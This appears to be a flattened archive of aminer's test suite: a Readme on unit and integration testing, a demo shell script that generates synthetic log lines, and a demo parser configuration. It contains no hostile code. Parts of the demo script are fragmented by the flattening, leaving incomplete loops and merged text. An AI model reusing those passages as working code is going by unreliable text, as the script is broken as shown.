WORKDIR /home/aminer/aecid-testsuite # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/testingwrapper.sh"] logdata-anomaly-miner-2.6.1/aecid-testsuite/Readme.md000066400000000000000000000540001437606560100225230ustar00rootroot00000000000000# aecid-testsuite This project includes all kinds of tests for *AECID* and *aminer*. We used Docker instances for testing (see: [How to use the aecid-testsuite](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite)). The aminer was successfully tested with all tests in **Ubuntu 20.04** and **Debian Bullseye**. In order to execute test classes the current path must be the *logdata-anomaly-miner* directory and the project structure must be as following: ## Guidelines for testing To provide the best quality of code possible we use the guidelines described in this chapter for all unittests. Before writing the unittests, a complete index should be created with all test cases for the component. This index must be reviewed with at least another person who knows the component. If the rules are followed, a reviewer should be able to see very clearly: * What is being tested? * Which INPUT is used for testing? * Which OUTPUT was expected? ### General Rules - Unittest classes must be named \Test.py - Parameter initialization: every test has to initialize it's own values to prevent unintentional changes in different test cases. - Input values must not be initialized in setup methods or as global variables. - It should be clear what input an unittest uses and what output is expected. - An unittest may only fullfill one case and no more. - Wherever possible, a test should only deliver an assert, unless the state that arises in the test is explicitly checked. - Unittests must fullfill following naming pattern (for every test class the numbering is reset): test\<#number of test\>\_\\_\ - Unittests must contain a description in form of a docstring in which the structure of the test, tested input value and expected output are described. - Unittests must not have any dependencies with each other and any global changes must be reset after every test case. Every test case must run independently from other tests. - Unittest cases must only contain the tested components and only necessary input values. - Cases must test only one component. Dependencies to other classes or handlers must be solved by dummy classes without functionality. - Test cases must be as short as possible. If test cases fail it should be clear what the error is. - Test code should be readable to be able to see the input and expected output values. - Tests should be as simple as possible. If this is not possible, we should think again about the structure of our code. This can be a clear indication that the code is not clear and simple. - Helper functions should also be tested separately. ### Rules for input values - All or as many as possible / meaningful parameters must be tested. If it is not possible to test all cases at least edge cases must be tested. - Correlations between parameters must be examined and combinations must be tested extensively. - Expected error cases must be tested. - All paths that lead to exceptions must be tested separately. - Different return values must also be tested. - Inputs must not be random or time based. Unittests must always lead to the same expected outputs. ## Unit-Tests ```logdata-anomaly-miner/ ├── aminer │ ├── __init__.py │ ├── AminerConfig.py │ ├── AnalysisChild.py │ ├── analysis │ ├── ... │ ├── events │ ├── ... │ ├── generic │ ├── ... │ ├── input │ ├── ... │ ├── parsing │ ├── ... │ ├── input │ ├── ... │ ├── util │ ├── ... ├── unit ├── __init__.py ├── analysis ├── __init__.py ├── AtomFiltersTest.py ├── EnhancedNewMatchPathValueComboDetectorTest.py ├── HistogramAnalysisTest.py ├── MatchValueAverageChangeDetectorTest.py ├── MatchValueStreamWriterTest.py ├── MissingMatchPathValueDetectorTest.py ├── NewMatchPathDetectorTest.py ├── NewMatchPathValueComboDetectorTest.py ├── NewMatchPathValueDetectorTest.py ├── RulesTest.py ├── TimestampCorrectionFiltersTest.py ├── TimestampsUnsortedDetectorTest.py ├── AllowlistViolationDetectorTest.py ├── ... ├── events ├── __init__.py ├── DefaultMailNotificationEventHandlerTest.py ├── StreamPrinterEventHandlerTest.py ├── SyslogWriterEventHandlerTest.py ├── UtilsTest.py ├── ... ├── generic ├── __init__.py ├── CronParsingModelTest.py ├── input ├── __init__.py ├── ByteStreamLineAtomizerTest.py ├── LogStreamTest.py ├── SimpleByteStreamLineAtomizerFactoryTest.py ├── SimpleMultisourceAtomSyncTest.py ├── SimpleUnparsedAtomHandlerTest.py ├── ... ├── testutilities ├── config.py ├── ... ├── parsing ├── __init__.py ├── AnyByteDataModelElementTest.py ├── DateTimeModelElementTest.py ├── DebugModelElementTest.py ├── DecimalFloatValueModelElementTest.py ├── DecimalIntegerValueModelElementTest.py ├── DelimitedDataModelElementTest.py ├── FirstMatchModelElementTest.py ├── FixedDataModelElementTest.py ├── FixedWordlistDataModelElementTest.py ├── HexStringModelElementTest.py ├── IpAddressDataModelElementTest.py ├── MatchElementTest.py ├── OptionalMatchModelElementTest.py ├── ParserMatchTest.py ├── RepeatedElementDataModelElementTest.py ├── SequenceModelElementTest.py ├── VariableByteDataModelElementTest.py ├── ... ├── util ├── __init__.py ├── JsonUtilTest.py ├── PersistenceUtilTest.py ├── SecureOSFunctionsTest.py ├── ... ``` Before starting any test case the path to the *config.py* should be changed. This can be achieved recursively by using following command (*/path/to/config.py* needs to be changed.): ``` sudo find . -type f -name "*Test.py" -print0 | xargs -0 sed -i -e 's#/home/user/Downloads/logdata-anomaly-miner-1.0.0/logdata-anomaly-miner/source/root/etc/aminer/config.py#/path/to/config.py#g' ``` Every test case can be executed by using following command in the main directory: ``` python3 -m unittest discover -s unit -p '*Test.py' ``` Single test classes can be executed with this command: ``` python3 -m unittest ``` for example: ``` python3 -m unittest unit/parsing/AnyByteDataModelElementTest.py ``` The created mails under */var/spool/mail/root* should be deleted. ## Integration Testing: To prepare every test the associated configuration file(s) first must be copied to */tmp*. The test-scripts **MUST NOT** be run as root. In addition, **declarations.sh** must be in the **same folder** as the integration test being run. Please note that the script needs root privileges for running the *aminer* and all **persistent data is deleted** from */tmp/lib/aminer*! ### Integration Test 1: In this integration test the learning phase of the aminer is tested. Multiple log-lines are used to be learned and checked. Some analysis components are used and all other lines are handled by the *SimpleUnparsedAtomHandler*. The Events are received by a *DefaultMailNotificationEventHandler* and a *StreamPrinterEventHandler*. Other lines are used to check if the pathes were learned and persisted in the persistence directory of the *aminer*. In this test case the *SubhandlerFilter* is suitable, because only one file, */tmp/syslog*, is monitored. Following command makes the script executeable: ``` sudo chmod +x aminerIntegrationTest.sh ``` **config.py** must be copied to */tmp/config.py*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest.sh ``` ### Integration Test 2: In this integration test multiple log files are used with the *SimpleMultisourceAtomSync*-handler with (*config22.py*) and without (*config21.py*) a defaultTimestampPath. Therefor the test is divided into two parts. The log lines all have different times and are distributed in */tmp/syslog* and */tmp/auth.log* and should be in the correct order while running the test. Also the consistency and correctness of the output from the receiveEvent-method is tested. The *analysis*-components are same with the first integration test. This test case also uses the *SyslogWriterEventHandler* and checks the output with the expected results. Following command makes the script executeable: ``` sudo chmod +x aminerIntegrationTest2.sh ``` **config21.py** and **config22.py** must be copied to */tmp/*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest2.sh ``` ## Demo: The goal of this demo is to create a representative output of all the different *analysis*-components of the *aminer*. Every component has its own comment section, which starts with **:< /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/demo-config.py if ! test -f "$FILE"; then FILE=/tmp/demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi fi #start aminer sudo aminer --config "$FILE" & PID=$! #EventCorrelationDetector, NewMatchPathDetector #:<> $LOGFILE sleep 0.0001 done #Comment #EnhancedNewMatchPathValueComboDetector, NewMatchPathValueDetector, ModuloTimeMatchRule #:<> $LOGFILE done done #Comment #HistogramAnalysis, MatchFilter #:<> $LOGFILE t=`date +%s` done #PathDependentHistogramAnalysis sleep 0.5 echo "Generating data for the ModuloTimeBinDefinition histogram report.." startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+11` ]]; do R=`shuf -i 0-86400 -n 1` echo "Random: $R" >> $LOGFILE t=`date +%s` done #Comment #MatchValueAverageChangeDetector #:<> $LOGFILE t=`date +%s` done startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+1` ]]; do R=`shuf -i 300-1000 -n 1` echo $R >> $LOGFILE t=`date +%s` done #Comment #MatchValueStreamWriter #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #MissingMatchPathValueDetector, NewMatchPathDetector #:<> $LOGFILE sleep 3 #MissingMatchPathValue expected echo second echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 0.5 #No output expected echo third echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 4 #MissingMatchPathValue expected echo fourth echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE #Comment #NewMatchPathValueComboDetector, NewMatchPathValueDetector #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #NewMatchIdValueComboDetector #:<> $LOGFILE echo 'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE # StringRegexMatchRule echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=no exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE #Comment #TimeCorrelationDetector #At least 3000 lines must be passed to trigger the TimeCorrelationDetector. #TimeCorrelationViolationDetector #The input text is saying that the time between cron job announcement and execution is 5 minutes, but in reality it is 5 seconds for more convenience. #:<> $LOGFILE sleep 4 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #wrong Job Number ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50001]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #expected time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #too long time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 7 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #Comment # AllowlistRules, AllowlistViolationDetector #:<> $LOGFILE echo "User root logged in" >> $LOGFILE who | awk '{print $1,$3,$4}' | while read user time; do \ echo User $user logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago.>> $LOGFILE echo User root logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago. >> $LOGFILE; done #Comment #:<> $LOGFILE # AnyByteDataModelElement echo "Any:dafsdff12%3§fasß?–_=yy" >> $LOGFILE echo "Any:äöüß" >> $LOGFILE # Base64StringModelElement echo "VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg==" >> $LOGFILE # DateTimeModelElement ({ echo "Current DateTime: " && date '+%d.%m.%Y %T' | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE # DecimalFloatValueModelElement echo "-25878952156245.222239655488955" >> $LOGFILE # DecimalIntegerValueModelElement echo "- 3695465546654" >> $LOGFILE # DelimitedDataModelElement echo "This is some part of a csv file;" >> $LOGFILE # ElementValueBranchModelElement echo "match data: 25000" >> $LOGFILE # HexStringModelElement echo "b654686973206973206a7573742061206e6f726d616c2074657874" >> $LOGFILE # IpAddressModelElement echo "Gateway IP-Address: 192.168.128.225" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.8.8" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.4.4" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 10.0.0.0" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 11.0.0.0" >> $LOGFILE # MultiLocaleDateTimeModelElement echo "Feb 25 2019" >> $LOGFILE # OptionalMatchModelElement echo "The-searched-element-was-found!" >> $LOGFILE # RepeatedElementDataModelElement for i in {1..5}; do R=`shuf -i 1-45 -n 1` echo "[drawn number]: $R" | tr -d "\n" >> $LOGFILE done echo "" >> $LOGFILE # VariableByteDataModelElement echo "---------------------------------------------------------------------" >> $LOGFILE # WhiteSpaceLimitedDataModelElement alphabet="abcdefghijklmnopqrstuvwxyz " text="z" for i in {1..1000}; do R=`shuf -i 0-26 -n 1` text=$text${alphabet:R:1} if [ $R -eq 26 ]; then break fi done echo "$text" >> $LOGFILE #Comment #stop aminer sleep 3 & wait $! sudo pkill -x aminer wait $PID RES=$? sudo rm $LOGFILE exit $RES logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminer/demo-config.py000066400000000000000000000756101437606560100257560ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # skipcq: PY-W0072 # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # skipcq: BAN-B108 # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 config_properties['Core.PersistencePeriod'] = 600 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' config_properties['Log.StatisticsPeriod'] = 3600 config_properties['Log.StatisticsLevel'] = 1 config_properties['Log.DebugLevel'] = 1 config_properties['Log.Rotation.BackupCount'] = 5 config_properties['Log.Rotation.MaxBytes'] = 104857600 # 100 Megabytes # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User/LoginDetails', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement( 'PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [ SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User/UserIPAddress', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_audit = [ SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('se', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('se2', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) import locale loc = locale.getlocale() if loc == (None, None): loc = ('en_US', 'utf8') service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', None, '%s.%s' % loc)])) service_children_parsing_model_element.append( RepeatedElementDataModelElement('RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'[drawn number]: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append( SequenceModelElement('se', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('fixed', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # 